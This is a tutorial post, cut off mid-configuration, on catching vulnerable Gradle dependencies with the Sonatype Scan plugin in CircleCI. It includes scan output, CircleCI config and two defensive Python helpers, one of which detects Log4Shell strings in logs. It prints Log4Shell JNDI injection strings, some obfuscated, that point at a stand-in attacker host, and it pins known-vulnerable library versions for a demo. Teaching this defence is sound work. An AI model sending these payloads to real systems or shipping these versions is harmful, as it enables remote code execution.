Tutorials · Apr 22, 2025 · 8 min read

Automating vulnerability scanning for Gradle dependencies with CircleCI

Hangga Aji Sayekti

Software Engineer


Detecting dependency vulnerabilities in a Gradle-based project is crucial because it prevents applications from using libraries (dependencies) with security holes.

Imagine an application as a house. Each dependency, or library used in the project, is like building material (such as wood, glass, or bricks). If there’s a flawed or easily penetrable material, the house can become unsafe, such as being more vulnerable to thieves or collapsing during an earthquake.

In software development, security vulnerabilities in dependencies can be exploited by attackers to infiltrate systems, steal data, or damage applications. To mitigate these risks, it is essential to detect and update vulnerable dependencies.

In this article, you will learn how to automatically detect dependency vulnerabilities on CI/CD with CircleCI.

Prerequisites

To follow this tutorial, a few things are required:

Risks of dependency vulnerabilities

Vulnerabilities in dependencies can serve as entry points for attackers. Exploiting a vulnerable dependency is often more damaging than a bug in the application’s own code: the flaw is shared by every application that ships the library, exploit code is usually public and reusable, and the affected code is rarely reviewed by the team that depends on it.

A real-life example of a dependency vulnerability is CVE-2021-44228, known as Log4Shell, which affects Log4j 2 from 2.0-beta9 through 2.14.1 (the first fix, in 2.15.0, was itself incomplete, as the scan output later in this post shows with CVE-2021-45046).

How does an attacker use the vulnerability?

The vulnerability is in the JNDI lookup feature of Log4j 2; 2.14.1 is the version used in this tutorial. Log4j is a logging library widely used in Java applications to record various pieces of information.

The problem is that Log4j applied its ${...} lookup substitution to the content of log messages, not only to its own configuration, and the jndi lookup resolves whatever name the string contains through JNDI, contacting the server it names. An attacker therefore only needs to get a string like the following into something the application logs, such as a User-Agent header, a username, or a search term:

${jndi:ldap://malicious-server.com/exploit}

If the application logs this string, Log4j resolves the lookup, connects to the attacker-controlled LDAP server, and the server’s response can direct the JVM to load a Java class from a remote location. That class is then instantiated inside the application, running the attacker’s code without any authentication.

This is called Remote Code Execution (RCE). In RCE, an attacker can run commands on the victim’s server, opening a loophole to steal data, take over the system, or perform further attacks.
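As an added example (not code from the original post), here is a small Python detector that flags Log4Shell-style lookup strings in log lines. It first expands nested lookups the way Log4j 2 would, so that the obfuscated forms attackers used to hide the literal jndi token (${lower:j}, ${::-j}, ${env:NOPE:-j}, which are not discussed on the page) are caught as well as the plain string shown above. The access-log lines are constructed for the example; the last field stands in for a User-Agent header, a common injection point because it is logged verbatim.

```python
import re

# Innermost "${...}" expression: a body with no nested "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# Final check after normalisation: "${jndi:<scheme>:<target>}".
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z][a-z0-9+.-]*):([^}]*)\}", re.IGNORECASE)

# Constructed sample lines (access-log style); the last field is the User-Agent.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://malicious-server.com/exploit}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://malicious-server.com/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://malicious-server.com/b}"',
    '10.0.0.7 - - "GET /cart?total=$5 HTTP/1.1" 200 "curl/8.0"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${env:HOME}"',
]


def _rewrite(body: str) -> str:
    """Expand one innermost lookup the way Log4j 2's substitutor would."""
    m = re.match(r"(lower|upper):(.*)$", body, re.IGNORECASE)
    if m:                        # ${lower:J} -> J; case is irrelevant because the
        return m.group(2)        # final match below is case-insensitive
    if ":-" in body:             # ${::-j}, ${env:NOPE:-j}, ${sys:x:-j} -> "j"
        return body.split(":-", 1)[1]
    return "${" + body + "}"     # unknown lookup (including jndi): keep as-is


def normalize_lookups(s: str) -> str:
    """Expand nested lookups innermost-first until the string stops changing."""
    while True:
        expanded = _INNER.sub(lambda m: _rewrite(m.group(1)), s)
        if expanded == s:
            return s
        s = expanded


def scan_log_lines(lines):
    """Return [(line_no, scheme, target)] for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for m in _JNDI.finditer(normalize_lookups(line)):
            hits.append((n, m.group(1).lower(), m.group(2).strip()))
    return hits


if __name__ == "__main__":
    for n, scheme, target in scan_log_lines(SAMPLE_LINES):
        print(f"line {n}: jndi lookup via {scheme} -> {target}")
```

The important design point is the normalisation step: matching only the literal ${jndi: would miss lines 3 and 4, which is exactly how early WAF signatures were bypassed. This catches the injection attempt in logs; it does not replace upgrading the library, since a logged string is already inside the process by the time it appears here.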

Possible outcomes of unaddressed vulnerabilities

  • Remote code execution (RCE): Attackers can take control of affected systems.
  • Data theft: Sensitive information such as credentials or user data can be stolen.
  • Malware & ransomware: Attackers can plant malware on targeted servers.
  • Service disruption: Applications can be compromised or shut down by attackers.

Detecting dependency vulnerabilities

To better understand this issue, let’s create a simple project example with Gradle. In this post, we use IntelliJ IDEA. Open the IDE and create a new project as shown in the screenshot below:

New project

The project structure will be like the tree shown below:

VulnDependenciesCheck/
├── gradle/
│   └── wrapper/
│       ├── gradle-wrapper.jar
│       └── gradle-wrapper.properties
├── src/
│   └── main/
│       └── java/
├── build.gradle
├── gradle.properties
├── gradlew
├── gradlew.bat
└── settings.gradle

Let’s open the build.gradle file and add the following dependencies in the dependencies block:

implementation 'org.apache.struts:struts2-core:2.5.10'
implementation 'org.apache.logging.log4j:log4j-core:2.14.1'
implementation 'com.google.guava:guava:24.1.1-jre'

All three dependencies are vulnerable:

  1. org.apache.struts:struts2-core:2.5.10. This version is vulnerable to Remote Code Execution (RCE), including CVE-2017-5638, the flaw exploited in the 2017 Equifax breach: a crafted Content-Type header handled by the Jakarta Multipart parser is evaluated as an OGNL expression.
  2. org.apache.logging.log4j:log4j-core:2.14.1. This version is affected by the Log4Shell vulnerability (CVE-2021-44228). An attacker can obtain RCE by getting a string containing ${jndi:...} logged.
  3. com.google.guava:guava:24.1.1-jre. This version still carries two known issues that the scan below reports, CVE-2023-2976 and CVE-2020-8908: temporary files are created in a shared directory with insecure permissions, letting another local user read or tamper with their contents. (24.1.1 is the release that fixed the earlier deserialization DoS, CVE-2018-10237, so that one is not reported.)

An IDE like IntelliJ IDEA can also flag vulnerable dependencies, but only as a warning: nothing forces you to fix it.

IDE detection

There are a few key reasons why manual or local security scans are often not enough:

1. Developers often skip local scans due to time pressure. In a fast-paced development environment, developers are more focused on new features and bug fixes than on running security scans.

They may think, “As long as my code runs on my machine, that’s good enough,” without considering the security risk. IntelliJ IDEA even offers an option to suppress the vulnerability warning, so a local warning is easy to make disappear.

2. Inconsistent results across environments. A local scan reflects one machine’s state: a different JDK or Gradle version can change which artifacts are resolved, and cached or stale dependencies and an out-of-date local vulnerability index can make local results differ from those in CI/CD.

3. No centralized visibility and enforcement. Without a centralized security scanning system, an enterprise has no clear picture of the security posture of its applications, and no standard way to ensure that every team follows the established security policies.

Security threats can slip through undetected until the code is in production, where remediation is much more expensive. IDE or local scanning therefore has significant limitations.

Automating vulnerability detection

One solution is to integrate automated security scanning into the CI/CD pipeline and use a centralized platform for monitoring and enforcing security policies.

Many dev teams use CircleCI because it offers fast builds, flexible configuration via YAML, native Docker support, and dependency caching, all of which speed up the pipeline. Its integration with GitHub and Bitbucket and its ability to run jobs in parallel across multiple executors make it a practical choice for teams that want a scan to run on every push without slowing delivery.

Using Sonatype Scan

Sonatype Scan Gradle Plugin is a Gradle plugin that allows you to scan, evaluate, and audit dependencies in Gradle projects using Sonatype platforms, such as OSS Index and Nexus IQ Server.

Using this plugin, you can identify open-source components in your project that have known security vulnerabilities, helping to ensure the security and compliance of your software.

Open the build.gradle file and add the Sonatype Scan plugin in the plugins block:

plugins {
  // ...other plugins
  id 'org.sonatype.gradle.plugins.scan' version '2.8.3' // Update the version as needed
}

Try running a scan locally first. Open a terminal in the IDE and run:

./gradlew ossIndexAudit

Let’s see the results:

Local scan

Here is the complete log output:

  ________  ___   ___  __   ____  ____________   _  __
 / ___/ _ \/ _ | / _ \/ /  / __/ / __/ ___/ _ | / |/ /
/ (_ / , _/ __ |/ // / /__/ _/  _\ \/ /__/ __ |/    /
\___/_/|_/_/ |_/____/____/___/ /___/\___/_/ |_/_/|_/

  _      _                       _   _
 /_)    /_`_  _  _ _/_   _  _   (/  /_`_._  _   _/ _
/_)/_/ ._//_// //_|/ /_//_//_' (_X /  ///_'/ //_/_\
   _/                _//
Gradle Scan version: 2.8.3
------------------------------------------------------------------------------------------------------------------------------------------------------

Checking vulnerabilities in 15 dependencies
Found vulnerabilities in 5 dependencies
[1/5] - pkg:maven/org.apache.struts/struts2-core@2.5.10 - 12 vulnerabilities found!

   Vulnerability Title:  [CVE-2017-12611] CWE-20: Improper Input Validation
   ID:  CVE-2017-12611
   Description:  In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string l...
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2017-12611
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2017-12611?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2017-5638] CWE-755: Improper Handling of Exceptional Conditions
   ID:  CVE-2017-5638
   Description:  The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-...
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2017-5638
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2017-5638?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2019-0230] CWE-1321
   ID:  CVE-2019-0230
   Description:  Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code ...
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2019-0230
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2019-0230?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2020-17530] CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
   ID:  CVE-2020-17530
   Description:  Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache...
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2020-17530
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2020-17530?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2023-50164] CWE-552: Files or Directories Accessible to External Parties
   ID:  CVE-2023-50164
   Description:  An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicio...
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2023-50164
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2023-50164?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2018-11776] CWE-noinfo
   ID:  CVE-2018-11776
   Description:  Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true ...
   CVSS Score:  (8.1/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2018-11776
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2018-11776?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2017-9804] CWE-20: Improper Input Validation
   ID:  CVE-2017-9804
   Description:  In Apache Struts 2.3.7 through 2.3.33 and 2.5 through 2.5.12, if an application allows entering a URL in a form field and built-in URLVal...
   CVSS Score:  (7.5/10, High)
   CVSS Vector:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2017-9804
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2017-9804?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2019-0233] CWE-281: Improper Preservation of Permissions
   ID:  CVE-2019-0233
   Description:  An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload.
   CVSS Score:  (7.5/10, High)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2019-0233
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2019-0233?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2023-34396] CWE-770: Allocation of Resources Without Limits or Throttling
   ID:  CVE-2023-34396
   Description:  Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache ...
   CVSS Score:  (7.5/10, High)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2023-34396
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2023-34396?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2017-9787] CWE-284: Improper Access Control
   ID:  CVE-2017-9787
   Description:  Struts 2 - OGNL access to class members of Spring proxy  The software does not restrict or incorrectly restricts access to a resource fro...
   CVSS Score:  (7.1/10, High)
   CVSS Vector:  CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
   CVE:  CVE-2017-9787
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2017-9787?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2023-34149] CWE-770: Allocation of Resources Without Limits or Throttling
   ID:  CVE-2023-34149
   Description:  Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts.This issue affects Apache ...
   CVSS Score:  (6.5/10, Medium)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2023-34149
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2023-34149?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2017-7672] CWE-20: Improper Input Validation
   ID:  CVE-2017-7672
   Description:  If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which wi...
   CVSS Score:  (5.9/10, Medium)
   CVSS Vector:  CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2017-7672
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2017-7672?component-type=maven&component-name=org.apache.struts%2Fstruts2-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

[2/5] - pkg:maven/commons-fileupload/commons-fileupload@1.3.2 - 2 vulnerabilities found!

   Vulnerability Title:  [CVE-2016-1000031] CWE-284: Improper Access Control
   ID:  CVE-2016-1000031
   Description:  Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2016-1000031
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2016-1000031?component-type=maven&component-name=commons-fileupload%2Fcommons-fileupload&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2023-24998] CWE-770: Allocation of Resources Without Limits or Throttling
   ID:  CVE-2023-24998
   Description:  Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attack...
   CVSS Score:  (7.5/10, High)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2023-24998
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2023-24998?component-type=maven&component-name=commons-fileupload%2Fcommons-fileupload&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

[3/5] - pkg:maven/commons-io/commons-io@2.4 - 2 vulnerabilities found!

   Vulnerability Title:  [CVE-2024-47554] CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')
   ID:  CVE-2024-47554
   Description:  Uncontrolled Resource Consumption vulnerability in Apache Commons IO.  The org.apache.commons.io.input.XmlStreamReader class may excessiv...
   CVSS Score:  (5.3/10, Medium)
   CVSS Vector:  CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
   CVE:  CVE-2024-47554
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2024-47554?component-type=maven&component-name=commons-io%2Fcommons-io&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2021-29425] CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
   ID:  CVE-2021-29425
   Description:  commons-io - Path Traversal [CVE-2021-29425]  The software uses external input to construct a pathname that is intended to identify a fil...
   CVSS Score:  (5.3/10, Medium)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
   CVE:  CVE-2021-29425
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2021-29425?component-type=maven&component-name=commons-io%2Fcommons-io&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

[4/5] - pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1 - 4 vulnerabilities found!

   Vulnerability Title:  [CVE-2021-44228] CWE-20: Improper Input Validation
   ID:  CVE-2021-44228
   Description:  Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log m...
   CVSS Score:  (10.0/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   CVE:  CVE-2021-44228
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2021-44228?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2021-45046] CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
   ID:  CVE-2021-45046
   Description:  It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This cou...
   CVSS Score:  (9.0/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
   CVE:  CVE-2021-45046
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2021-45046?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2021-44832] CWE-20: Improper Input Validation
   ID:  CVE-2021-44832
   Description:  Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execut...
   CVSS Score:  (6.6/10, Medium)
   CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
   CVE:  CVE-2021-44832
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2021-44832?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2021-45105] CWE-20: Improper Input Validation
   ID:  CVE-2021-45105
   Description:  Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-refer...
   CVSS Score:  (5.9/10, Medium)
   CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
   CVE:  CVE-2021-45105
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2021-45105?component-type=maven&component-name=org.apache.logging.log4j%2Flog4j-core&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

[5/5] - pkg:maven/com.google.guava/guava@24.1.1-jre - 2 vulnerabilities found!

   Vulnerability Title:  [CVE-2023-2976] CWE-552: Files or Directories Accessible to External Parties
   ID:  CVE-2023-2976
   Description:  Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix syst...
   CVSS Score:  (7.1/10, High)
   CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
   CVE:  CVE-2023-2976
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2023-2976?component-type=maven&component-name=com.google.guava%2Fguava&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

   Vulnerability Title:  [CVE-2020-8908] CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
   ID:  CVE-2020-8908
   Description:  guava - Creation of Temporary File in Directory with Insecure Permissions [CVE-2020-8908]  The software creates a temporary file in a dir...
   CVSS Score:  (3.3/10, Low)
   CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
   CVE:  CVE-2020-8908
   Reference:  https://ossindex.sonatype.org/vulnerability/CVE-2020-8908?component-type=maven&component-name=com.google.guava%2Fguava&utm_source=ossindex-client&utm_medium=integration&utm_content=1.8.2

> Task :ossIndexAudit FAILED

In this log, each vulnerability is listed with a description, CVSS score and vector, CVE identifier, and a link to the detailed OSS Index entry. The plugin (v2.8.3) checked 15 dependencies, not just the three declared in build.gradle: Gradle resolves the full dependency graph, and struts2-core pulls in commons-fileupload 1.3.2 and commons-io 2.4, which carry findings of their own (including the Critical RCE CVE-2016-1000031). To see which declared dependency is responsible for a transitive finding, run ./gradlew dependencyInsight --dependency commons-fileupload --configuration runtimeClasspath. struts2-core@2.5.10 is the worst offender with 12 CVEs; the scanner rates six of them Critical, and five of those score 9.8 and allow remote code execution. The rest are High or Medium: input validation flaws, file upload path traversal, and resource exhaustion. Note that the scanner labels CVE-2018-11776 (8.1) as Critical, whereas the CVSS v3.1 qualitative scale calls 7.0 to 8.9 High; if your policy keys off the label rather than the numeric score, check which scale the tool applies.

🔴 Status: Build FAILED. The ossIndexAudit task fails the build when it reports findings, so the pipeline sees a non-zero exit code rather than just a printed warning.
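As an added example (not code from the post or from the Sonatype plugin), the following Python script parses the ossIndexAudit text report into records, re-derives the CVSS rating from the numeric score so that policy does not depend on the scanner’s label, and applies a hypothetical gate: fail at CVSS 7.0 or higher unless the CVE is on an explicit risk-acceptance list. The embedded log is an abridged copy of the scan output shown above; the fail_at threshold and the accepted set are assumptions for the example, not plugin settings.

```python
import re
from dataclasses import dataclass

# Abridged copy of the ossIndexAudit output shown above; entries are omitted,
# so the "N vulnerabilities found!" counts exceed what is listed here.
SAMPLE_AUDIT_LOG = """\
Checking vulnerabilities in 15 dependencies
Found vulnerabilities in 5 dependencies
[1/5] - pkg:maven/org.apache.struts/struts2-core@2.5.10 - 12 vulnerabilities found!
   Vulnerability Title:  [CVE-2017-5638] CWE-755: Improper Handling of Exceptional Conditions
   ID:  CVE-2017-5638
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   ID:  CVE-2018-11776
   CVSS Score:  (8.1/10, Critical)
   CVSS Vector:  CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
   ID:  CVE-2017-7672
   CVSS Score:  (5.9/10, Medium)
   CVSS Vector:  CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
[2/5] - pkg:maven/commons-fileupload/commons-fileupload@1.3.2 - 2 vulnerabilities found!
   ID:  CVE-2016-1000031
   CVSS Score:  (9.8/10, Critical)
   CVSS Vector:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
[5/5] - pkg:maven/com.google.guava/guava@24.1.1-jre - 2 vulnerabilities found!
   ID:  CVE-2023-2976
   CVSS Score:  (7.1/10, High)
   CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
   ID:  CVE-2020-8908
   CVSS Score:  (3.3/10, Low)
   CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
> Task :ossIndexAudit FAILED
"""

_PKG = re.compile(r"^\[\d+/\d+\] - (pkg:\S+) - \d+ vulnerabilit")
_ID = re.compile(r"^\s*ID:\s+(\S+)")
_SCORE = re.compile(r"^\s*CVSS Score:\s+\((\d+(?:\.\d+)?)/10,\s*(\w+)\)")
_VECTOR = re.compile(r"^\s*CVSS Vector:\s+(\S+)")
_RATINGS = ((9.0, "Critical"), (7.0, "High"), (4.0, "Medium"), (0.1, "Low"))


@dataclass
class Finding:
    package: str   # purl, e.g. pkg:maven/org.apache.struts/struts2-core@2.5.10
    cve: str
    score: float   # numeric CVSS base score as printed by the scanner
    label: str     # severity label as printed by the scanner
    vector: str


def parse_audit_log(text: str) -> list:
    """Turn the scanner's text report into Finding records."""
    findings, package, current = [], None, None
    for line in text.splitlines():
        if m := _PKG.match(line):                    # package header line
            package = m.group(1)
        elif (m := _ID.match(line)) and package:     # "ID:" opens a finding;
            current = Finding(package, m.group(1), 0.0, "", "")  # title lines are ignored
            findings.append(current)
        elif (m := _SCORE.match(line)) and current:
            current.score, current.label = float(m.group(1)), m.group(2)
        elif (m := _VECTOR.match(line)) and current:
            current.vector = m.group(1)
    return findings


def severity_from_score(score: float) -> str:
    """CVSS v3.x/v4.0 qualitative rating derived from the numeric base score."""
    return next((name for floor, name in _RATINGS if score >= floor), "None")


def summarize(findings) -> dict:
    """Count findings per derived rating, not per printed label."""
    counts = {}
    for f in findings:
        rating = severity_from_score(f.score)
        counts[rating] = counts.get(rating, 0) + 1
    return counts


def gate(findings, fail_at: float = 7.0, accepted=frozenset()) -> list:
    """Hypothetical policy: block on score >= fail_at unless the CVE is on the
    explicit risk-acceptance list. Returns the blocking findings."""
    return [f for f in findings if f.score >= fail_at and f.cve not in accepted]


if __name__ == "__main__":
    found = parse_audit_log(SAMPLE_AUDIT_LOG)
    print("findings by derived rating:", summarize(found))
    for f in found:
        if f.label != severity_from_score(f.score):
            print(f"label mismatch: {f.cve} printed {f.label}, score {f.score} rates {severity_from_score(f.score)}")
    blocking = gate(found, fail_at=7.0)
    for f in blocking:
        print(f"BLOCK {f.cve} ({f.score}) in {f.package}")
    raise SystemExit(1 if blocking else 0)
```

Run stand-alone, the script exits non-zero because four findings score 7.0 or above, and it reports CVE-2018-11776 as the one entry whose printed label (Critical) disagrees with its score (8.1, High). In a pipeline this is the kind of step you would run over the saved audit output when you need a severity threshold or a time-boxed risk acceptance; the plugin itself, as the run above shows, fails the task outright when it reports findings.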

Automating Sonatype scan on CircleCI

To run Sonatype Scan on CircleCI, start by pushing your project to GitHub. Then, integrate it with CircleCI. During the setup, CircleCI will automatically create a new branch called circleci-project-setup, which includes an initial configuration file located at .circleci/config.yml.

The circleci-project-setup branch is generated by CircleCI to help initialize the pipeline configuration without directly modifying your main branch. This approach gives you the opportunity to review and customize the configuration before applying it to your primary development workflow.

When you open .circleci/config.yml, the default contents are:

# This config was automatically generated from your source code
# Stacks detected: deps:java:.,tool:gradle:
version: 2.1
jobs:
  test-java:
    docker:
      - image: cimg/openjdk:17.0
    steps:
      - checkout
      - run:
          name: Calculate cache key
          command: |-
            find . -name 'pom.xml' -o -name 'gradlew*' -o -name '*.gradle*' | \
                    sort | xargs cat > /tmp/CIRCLECI_CACHE_KEY
      - restore_cache:
          key: cache-{{ checksum "/tmp/CIRCLECI_CACHE_KEY" }}
      - run:
          command: ./gradlew check
      - store_test_results:
          path: build/test-results
      - save_cache:
          key: cache-{{ checksum "/tmp/CIRCLECI_CACHE_KEY" }}
          paths:
            - ~/.gradle/caches
      - store_artifacts:
          path: build/reports

  deploy:
    # This is an example deploy job, not actually used by the workflow
    docker:
      - image: cimg/base:stable
    steps:
      # Replace this with steps to deploy to users
      - run:
          name: deploy
          command: "#e.g. ./deploy.sh"

workflows:
  build-and-test:
    jobs:
      - test-java
    # - deploy:
    #     requires:
    #       - test-java

This workflow has two jobs by default, but only one is active.

  • test-java: Runs Java tests with Gradle in a Docker container (OpenJDK 17), uses caching, and stores test results and reports.
  • deploy: Placeholder for deployment; currently not used (commented out).

Now add a new job that runs the Sonatype scan in the workflow. Fetch the new branch from GitHub and check it out:

git fetch origin && git checkout circleci-project-setup

Open the .circleci/config.yml file and add the job:

  vulnerable-dependencies-scan:
    docker:
      - image: cimg/openjdk:17.0
